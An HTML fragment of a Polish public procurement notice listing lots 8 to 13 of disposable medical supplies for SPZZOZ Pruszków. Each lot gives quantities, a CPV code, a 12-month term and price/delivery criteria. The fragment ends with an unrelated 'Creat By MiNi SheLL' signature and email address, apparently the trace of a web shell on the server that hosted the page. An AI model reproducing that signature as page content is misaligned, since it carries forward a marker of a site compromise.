<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa sprzętu jednorazowego użytku dla potrzeb SPZZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Opis produktu	Ilość roczna
1	Łącznik do ssaka i tlenu 	  100szt
2	Wkład do ssaka 1000ml	 1000szt
3	Wkład do ssaka 1 500ml - 2000ml	 1 000szt.
4	Wkład do ssaka 3000ml	   600szt
RAZEM:.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostawa sprzętu jednorazowego użytku dla potrzeb SPZZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	System do zastosowania w krzyżowo-kolcowym mocowaniu pochwy.	4szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Dostawa sprzętu jednorazowego użytku dla potrzeb SPZZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis produktu	Ilość roczna
1	System  leczenia wypadania macicy, wskazany w zabiegach wypadnięcia przedniego i szczytowego poprzez wzmocnienie struktur dna macicy.	5 szt.
2	System  leczenia wypadania macicy, wskazany w zabiegach wypadnięcia tylnego i szczytowego poprzez wzmocnienie struktur dna macicy.	5 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Dostawy sprzętu jednorazowego użytku dla potrzeb SPZZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Taśma do leczenia wysiłkowego nietrzymania moczu u kobiet metodą TOT. Wykonana z niewchłanialnego polipropylenu monofilamentowego.
Parametry- szerokość-1,1 cm, grubość - 0,65mm, gramatura- 65g/m2, wielkość porów- 0,90 mm.
Brzegi taśmy zakończone są pętelkami. Taśma znajdująca się w osłonce. W zestawie znajdują się dwa narzędzia jednorazowego użytku wykonane z niekorodującego chromu. Ergonomiczne uchwyty zapewniają optymalną kontrolę podczas wprowadzania igły..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Dostawa sprzętu jednorazowego użytku dla potrzeb SPZZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis produktu	Ilość roczna	Producent
1	Testy biologiczne	400szt	
2	Taśma bez indykatora 19mm x 50mb	468 rol	
3	Taśma z indykatorem 18mm x 55mb	416rol	
4	Testy z arkuszem wczesnego ostrzegania	264szt	
5	Testy paskowe	104op	
6	Testy do kontroli jakości zgrzewu	250 szt	
7	Etykiety żółte	468 rol.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Dostawa sprzętu jednorazowego użytku dla potrzeb SPZZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa i opis przedmiotu zamówienia	Jednostka miary
	Przewidywana ilość na 24 m-ce 
1	Ręczniki papierowe  typu ZZ składane, szare o wym. szer. 23cm. dł. 25cm. gramatura 38g/m2 1op=4000 listków	op.	1200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com